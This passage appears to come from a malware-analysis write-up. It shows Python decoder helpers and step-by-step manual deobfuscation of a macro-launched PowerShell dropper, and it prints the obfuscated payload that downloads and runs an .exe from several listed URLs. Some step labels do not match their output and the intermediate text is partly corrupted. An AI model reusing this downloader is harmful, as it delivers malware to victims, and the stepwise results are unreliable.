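    Shell$ Outer, 0
End Sub

Function Outer()
    a1 = "xxHello,yy"
    p1 = Mid(a1, 3, 6)
    a2 = "zzworld"
    p2 = Mid(a2, 3, 5)
    Outer = Inner + Chr(34) + p1 + Chr(32) + p2 + Chr(33) + Chr(34)
End Function

Function Inner()
    b1 = "qqq>> "
    Inner = Mid(b1, 4, 3)
End Function
'''

# One token of a VBA expression: "literal" ("" escapes a quote), Mid(var, start, len),
# Chr(n), a bare identifier, or the + operator. Alternatives are ordered so that
# Mid/Chr are tried before the generic identifier rule.
TOKEN = re.compile(r'''
    "(?P<str>(?:[^"]|"")*)"
  | Mid\(\s*(?P<src>\w+)\s*,\s*(?P<start>\d+)\s*,\s*(?P<length>\d+)\s*\)
  | Chr\(\s*(?P<code>\d+)\s*\)
  | (?P<name>[A-Za-z_]\w*)
  | (?P<plus>\+)
''', re.VERBOSE | re.IGNORECASE)


def vba_mid(s, start, length):
    """VBA Mid(): start is 1-based; a length past the end just truncates."""
    return s[start - 1:start - 1 + length]


def parse_macro(text):
    """Collect {function_name: [(target, expression), ...]} from Function blocks."""
    funcs, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := re.match(r'Function\s+(\w+)\s*\(\s*\)', line, re.I):
            current = m.group(1)
            funcs[current] = []
        elif re.match(r'End\s+Function', line, re.I):
            current = None
        elif current is not None and (m := re.match(r'(\w+)\s*=\s*(.+)$', line)):
            funcs[current].append((m.group(1), m.group(2)))
    return funcs


def eval_expr(funcs, expr, local, depth):
    """Evaluate one right-hand side: concatenate every token's string value."""
    parts = []
    for tok in TOKEN.finditer(expr):
        if tok.group('plus') is not None:
            continue
        if tok.group('str') is not None:
            parts.append(tok.group('str').replace('""', '"'))
        elif tok.group('src') is not None:
            parts.append(vba_mid(local[tok.group('src')],
                                 int(tok.group('start')), int(tok.group('length'))))
        elif tok.group('code') is not None:
            parts.append(chr(int(tok.group('code'))))
        elif tok.group('name') in local:
            parts.append(local[tok.group('name')])
        elif tok.group('name') in funcs:
            # a bare function name is a call: this inlines the helper functions
            parts.append(evaluate(funcs, tok.group('name'), depth + 1))
        else:
            raise NameError(f"unknown identifier {tok.group('name')!r} in: {expr}")
    return ''.join(parts)


def evaluate(funcs, name, depth=0):
    """Run a Function body; its return value is whatever it assigns to its own name."""
    if depth > 50:
        raise RecursionError('function call chain too deep')
    local = {}
    for target, expr in funcs[name]:
        local[target] = eval_expr(funcs, expr, local, depth)
    if name not in local:
        raise ValueError(f'{name} never assigns its return value')
    return local[name]


def decode_macro(text):
    """Follow the Shell call in AutoOpen to the function that builds the command."""
    m = re.search(r'Shell\$?\s*\(?\s*(\w+)', text)
    if not m:
        raise ValueError('no Shell call found')
    return evaluate(parse_macro(text), m.group(1))


if __name__ == '__main__':
    print(decode_macro(SAMPLE_VBA))
```

Pointing decode_macro at a cleaned-up macro like the one above gives the same string that wscript.echo would print, without running anything from the document.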

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(3Gj & ( ([sTriNG]mQever'+'BosePr'+'EFErence)[1,3]+s3Gj+3GjDBxsDB-JoiNsDBsDB)3Gj+3Gj 

(
(
sDBaEsD'+'B+sDB1fsDB+sDBrasDB+sDBnc 3Gj+3Gj= sDB+sDBnewsDB'+'+sDB-sDB+sDBosD'+'B+3Gj+3GjsDBbje3Gj+3GjcsDB+sDBtsDB+sDB SystesDB+sDBm.NesDB+sDB'+'3Gj+3GjtsDB+sDB.sDB+sDBWesDB+sDBbCliesDB+sDBnts'+'DB+'+'sDB;sDB+sDBaE1nsDB+sDBsadasdsDB+sDB =s'+'DB+sD3Gj+3GjB sDB+sDBnewsD'+'B+sDB-objesDB+sDBct rsDB+sDBasDB+sDBndsDB+sDBosDB+sDBm'+';aE1bsDB+sDBcsDB+sDBd =sDB+sDB DsphsDB+sDBtsDB+sDBtp://sDB+sDBwwsDB+sD3Gj+3GjBw.sDB+sDBmesD3Gj+3GjB+sDBdi3Gj+3Gjcis'+'DB+sDBns3Gj+3GjDB+sDBes'+'DB+sDBdists'+'DB+sDBributor.com/sDB+sDBUVR3Gj+3GjJ/,h3Gj+3GjttpsD'+'B+sDB:/sDB+sDB/sDB+sDBwww.shopnz.in/fg/,sDB+sDBhtsDB+s3Gj+3GjDBtpsDB+sDB://csDB+sDBa'+'bsDB+sDBletvinternet'+'.usDB+sDBs/fFsDB+sDBQiRYu/,httsDB'+'+sDBp://www3Gj'+'+3Gj.sDB+sDBdongho'+'dinsDB+sDBhvi3Gj+3GjsDB+sDBgps.cosDB+sDBm/h/,sDB+sDBhttp://aj'+'asDB+sDBx3Gj+3GjtusDB+sDBbe.sDB+sDBco3Gj+3GjsDB+sD3G'+'j+3GjBm/tFsDB+sDBUIADPsDB+sDB/DsDB+sDBsp.Split(DssDB'+'+sDBpsDB+sDB,sDB+sDBDsDB+sDBsp)sDB+s'+'DB;aE1karasDB+sDBpasDB+sDBssDB+sD'+'B = sDB+sDBaEsDB+sDB1nssDB+sDBadasd.nsDB+sDBext(sDB+sDB1, 343245);aEsDB+sDB1huas = aE1esDB+sD'+'BnsDB+sDBv:sDB+sDB'+'pubsDB+sDBlsDB+sDBic sDB+sDB3Gj+3Gj+sDB+sDB DspsDB+sDB7H5'+'3Gj+3Gj'+'Dsp + aE1karapsDB+sDBas + s3Gj+3GjDB+sDBDsDB+sDBssDB+sDBp.exeDsp;sDB+sDBfosDB+sDBreachsDB+sDB(aE'+'1sDB+sDBasDB+sDBbc in aE1sDB+sDBbcds'+'DB+sDB){tr3Gj+3GjysDB+sDB{aE'+'1frsDB+sDBasD'+'B+sDBnsDB+sDBc.sDB+sDBDownlsDB+sDB3Gj+'+'3GjoadFisDB+sDBlsDB+sDBe(aEsDB+sDB1asDB+sDBb'+'c.TsDB+sDBoStsDB+sD'+'BrisDB+sDBng(), aE1'+'huasDB+sDB'+'s);InsDB+3Gj+3'+'GjsDBvoke-ItsDB+sDB'+'em('+'asDB+sDBE1sDB+sDB'+'hsDB+sDBua'+'s)sDB+sDB;breasDB'+'+sDBk3Gj+3Gj;}catsDB+sDBch{wsDB+'+'sDBr3Gj+3GjisDB+sDBte-host aE1_.ExsDB+sDBceptionsDB+s'+'DB.sDB+sDBMessagesDB'+'+sDB;}}sDB
)
.REpLacE(sDBDspsDB,['+'s'+'trI'+'ng][cH3Gj+3GjAr]39).REpLacE(([c3Gj+3GjHAr]55+[cHAr]72+[cHAr]53Gj+3Gj3),sDBzT2sDB'+').REpLacE(sDBaE1sDB,3Gj+3GjsDBmQes3Gj+3G'+'jDB) '+'
)
3Gj
)
-cREpLaCe3GjmQe3Gj,'+'[CHar'+']36 -REplAce  3Gj'+'zT23Gj,[CHar]92 -REplAce 3GjsDB3Gj,[CHar]39
)
PBw .( tiQSHEllId[1]'+'+tiQshElL'+'id[13]+3Gjx3Gj)')  -cREplACe  ([cHaR]116+[cHaR]105+[cHaR]81),[cHaR]36-REPLacE'3Gj',[cHaR]39-REPLacE([cHaR]80+[cHaR]66+[cHaR]119),[cHaR]124
)
)

As seen above, there is some more cleaning up to do to get rid of the extra obfuscation. What I did to get through this was to start at the last line and work through it to get the CHAR values and the replacement values. Once that was done, I took that information and applied it to the rest of the code. I did this over several iterations to get the script deobfuscated and more readable. The following steps show how I worked through the script to get to the final, cleaned up version.
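The “read the CHAR values off the last line, then apply them to the rest” loop can be written down directly. The example below is added here and is not the author’s code: it parses a PowerShell -replace / -creplace tail into an ordered list of substitutions (decoding [cHaR]N+[cHaR]M operands), applies them in order, and joins '+' string fragments. PAGE_TAIL is the final line shown above; SAMPLE is a constructed stand-in for the layered command, not the real payload.

```python
import re

# Tail of the decoded command as shown on this page: the -replace chain that undoes
# the outermost layer of token substitution.
PAGE_TAIL = ("-cREplACe  ([cHaR]116+[cHaR]105+[cHaR]81),[cHaR]36"
             "-REPLacE'3Gj',[cHaR]39-REPLacE([cHaR]80+[cHaR]66+[cHaR]119),[cHaR]124")

# Constructed stand-in with the page's layering: an inner script quoted with the 3Gj
# token and carrying its own -replace tail (mQe -> $, sDB -> '). Not the real payload.
SAMPLE = ("(3Gj mQex = sDBhel3Gj+3GjlosDB PBw Out-String; mQex 3Gj)"
          " -cREpLaCe 3GjmQe3Gj,[CHar]36 -REplAce 3GjsDB3Gj,[CHar]39")

CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
REPLACE_RE = re.compile(
    r"-(c?)replace\s*"                         # -replace (case-insensitive) or -creplace
    r"(\([^)]*\)|'[^']*'|\[char\]\d+)\s*,\s*"  # pattern: (char list), 'literal' or [char]N
    r"(\([^)]*\)|'[^']*'|\[char\]\d+)",        # replacement, same forms
    re.IGNORECASE)


def decode_literal(token):
    """Turn an operand such as ([cHaR]116+[cHaR]105+[cHaR]81), [cHaR]36 or '3Gj'
    into the plain string PowerShell would evaluate it to."""
    token = token.strip().strip("()").strip()
    if token.startswith("'") and token.endswith("'"):
        return token[1:-1].replace("''", "'")      # '' is an escaped quote in PowerShell
    codes = CHAR_RE.findall(token)
    if not codes or CHAR_RE.sub("", token).replace("+", "").strip():
        raise ValueError(f"cannot decode operand: {token!r}")
    return "".join(chr(int(c)) for c in codes)


def parse_replace_chain(tail):
    """Ordered list of (pattern, replacement, case_sensitive) read from a -replace tail."""
    return [(decode_literal(pat), decode_literal(rep), flag.lower() == "c")
            for flag, pat, rep in REPLACE_RE.findall(tail)]


def apply_replace_chain(text, chain):
    """Apply the substitutions left to right, as PowerShell does. -replace is a regex
    operator, so the pattern is escaped to keep it literal; the replacement goes through a
    callable so a '\\' or '$' in it is not interpreted by re.sub."""
    for pattern, replacement, case_sensitive in chain:
        flags = 0 if case_sensitive else re.IGNORECASE
        text = re.sub(re.escape(pattern), lambda _m: replacement, text, flags=flags)
    return text


def collapse_concat(text):
    """Join string fragments: 'ab'+'cd' -> 'abcd' (the manual "removed + signs" step)."""
    return re.sub(r"'\s*\+\s*'", "", text)


def peel_sample():
    """Two passes over SAMPLE: the page's outer chain first, then the inner script's own
    chain once it is exposed. Returns the inner script in the clear."""
    stage1 = apply_replace_chain(SAMPLE, parse_replace_chain(PAGE_TAIL))
    # after the first pass the inner script sits between ('  and  ') with its tail after it
    m = re.match(r"\('(.*)'\)\s*(.*)$", stage1, re.DOTALL)
    inner, tail2 = m.group(1), m.group(2)
    return apply_replace_chain(collapse_concat(inner), parse_replace_chain(tail2)).strip()


if __name__ == "__main__":
    print(parse_replace_chain(PAGE_TAIL))
    print(peel_sample())
```

Note that the .REpLacE(...) method calls further up the page are literal and case-sensitive, unlike -replace, so when extending the chain to those, pass case_sensitive=True.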

*** Cleaned up last line of code and converted CHAR to string ***
*** Manually removed + signs ***
*** Replaced all instances of tiQ with the $ character ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(3Gj & ( ([sTriNG]mQever''BosePr''EFErence)[1,3]s3Gj3GjDBxsDB-JoiNsDBsDB)3Gj3Gj 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc 3Gj3Gj= sDBsDBnewsDB''sDB-sDBsDBosD''B3Gj3GjsDBbje3Gj3GjcsDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''3Gj3GjtsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD3Gj3GjB sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD3Gj3GjBw.sDBsDBmesD3Gj3GjBsDBdi3Gj3Gjcis''DBsDBns3Gj3GjDBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR3Gj3GjJ/,h3Gj3GjttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs3Gj3GjDBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www3Gj''3Gj.sDBsDBdongho''dinsDBsDBhvi3Gj3GjsDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx3Gj3GjtusDBsDBbe.sDBsDBco3Gj3GjsDBsD3G''j3GjBm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB3Gj3GjsDBsDB DspsDBsDB7H5''3Gj3Gj''Dsp  aE1karapsDBsDBas  s3Gj3GjDBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr3Gj3GjysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB3Gj''3GjoadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB3Gj3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk3Gj3Gj;}catsDBsDBch{wsDB''sDBr3Gj3GjisDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH3Gj3GjAr]39).REpLacE(([c3Gj3GjHAr]55[cHAr]72[cHAr]53Gj3Gj3),sDB\sDB'').REpLacE(sDBaE1sDB,3Gj3GjsDBmQes3Gj3G''jDB) ''
)
3Gj
)
-cREpLaCe3GjmQe3Gj,''[CHar'']36 -REplAce  3Gj''\3Gj,[CHar]92 -REplAce 3GjsDB3Gj,[CHar]39
)
PBw .( $SHEllId[1]''$shElL''id[13]3Gjx3Gj)')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of 3Gj with ' (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]mQever''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDBmQes'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''[CHar'']36 -REplAce  '''\',[CHar]92 -REplAce 'sDB',[CHar]39
)
PBw .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of PBw with | (pipe character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]mQever''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDBmQes'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''[CHar'']36 -REplAce  '''\',[CHar]92 -REplAce 'sDB',[CHar]39
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Cleaned up 2nd to last line of code and converted CHAR to string ***
*** Replaced all instances of mQe with the $ character ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDB$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of mQe with \ (backslash character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDB$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of sDB with ' (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
